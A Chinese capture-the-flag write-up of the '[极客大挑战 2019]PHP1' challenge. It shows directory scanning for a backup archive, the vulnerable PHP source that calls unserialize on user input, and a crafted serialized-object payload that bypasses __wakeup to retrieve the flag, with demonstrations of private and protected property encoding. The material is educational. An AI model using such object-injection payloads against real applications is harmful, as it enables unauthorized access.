zoukankan      html  css  js  c++  java

  • [极客大挑战 2019]PHP1

    知识点:PHP序列化与反序列化,最下方有几个扩展可以看一下

    他说备份了,就肯定扫目录,把源文件备份扫出来

    dirsearch扫目录扫到www.zip压缩包

    img点击并拖拽以移动

    然后解压发现是,序列化。

    具体特征如下:

    index.php包含如下代码:接收参数,进行序列化

      <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
  ?>

    点击并拖拽以移动

    class.php含: 源码都放在着

    <?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
         
        }
    }
}
?>

    点击并拖拽以移动

    开始构造

    声明一个Name类,包含username,password,且两个变量都是private修饰,整句话都有用。

    然后根据判断句得知,username必须是admin,password必须是100所以,构造序列化

    O是对象,s是字符串,i是数字

    因为是private修饰的所以要加%00充当空格

    构造:O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

    payload:url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

    img点击并拖拽以移动

    下面是拓展+答疑:

    我看大佬的payload的时候,很疑惑为什么要写%00Name%00username这样的形式?

    然后我进行了三种修饰方式的测试:public,protected,private

    我忽然明白:

    只有public修饰的不用太多的修饰原生态构造就好,而private需要加%00Name%00

    protected则需要使用 %00*%00username这样的方式

    protected修饰变量,运行后回显代码内注释内容

    <?php
class Name{
	protected $username = 'nonono';////////////////看这两行
	protected $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//看这看这看这看这!!!!!!!!!
//运行会输出 O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}
?>

    点击并拖拽以移动

    public修饰变量,运行后回显代码内注释内容

    <?php
class Name{
	public $username = 'nonono';
	public $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>

    点击并拖拽以移动

    private修饰变量,运行后回显代码内注释内容

    <?php
class Name{
	private $username = 'nonono';
	private $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
?>

    点击并拖拽以移动
  • 相关阅读:
    Fast Search:爬网测试 金大昊(jindahao)
    FAST Search :deployment.xml
    TFS:强制签入已签出的文件 金大昊(jindahao)
    采用权限控制的工作流权限设计 金大昊(jindahao)
    FAST Search :创建自定义属性 金大昊(jindahao)
    SharePoint:替换搜索结果连接URL 金大昊(jindahao)
    SharePoint:迁移
    SharePoint:关于word模板内容类型(template.dotx) 金大昊(jindahao)
    SharePoint:备份和还原
    BCS 爬网报错 金大昊(jindahao)
  • 原文地址:https://www.cnblogs.com/h3zh1/p/12548971.html
Copyright © 2011-2022 走看看